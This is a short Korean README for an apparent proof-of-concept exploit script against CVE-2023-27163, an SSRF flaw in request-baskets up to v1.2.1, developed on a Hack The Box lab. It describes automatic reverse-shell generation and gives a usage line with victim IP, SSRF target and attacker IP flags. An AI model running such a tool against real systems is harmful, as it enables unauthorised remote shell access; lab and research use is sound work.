
request-baskets v1.2.1까지의 SSRF(서버 측 요청 위조) 취약점인 CVE-2023-27163용 개념 증명 익스플로잇. 자동화된 리버스 셸 생성 및 파일 노출이 포함됩니다.
CVE-2023-27163 PoC, SSRF, request-baskets v1.2.1까지
사용 예시
my_script.sh -i 10.10.11.111 -f 'localhost:80' -t 10.10.14.27
-i 피해자 서버 IP
-f SSRF로 인해 생성된 연결을 보낼 IP 또는 주소
-t 이 옵션에는 로컬 IP 또는 공격자 IP를 입력하여 rev.sh 파일을 생성하고 파일을 노출합니다.
-p 특정 포트를 설정하려는 경우 사용합니다.
이 스크립트는 HTB의 실습 환경을 기반으로 개발되었습니다.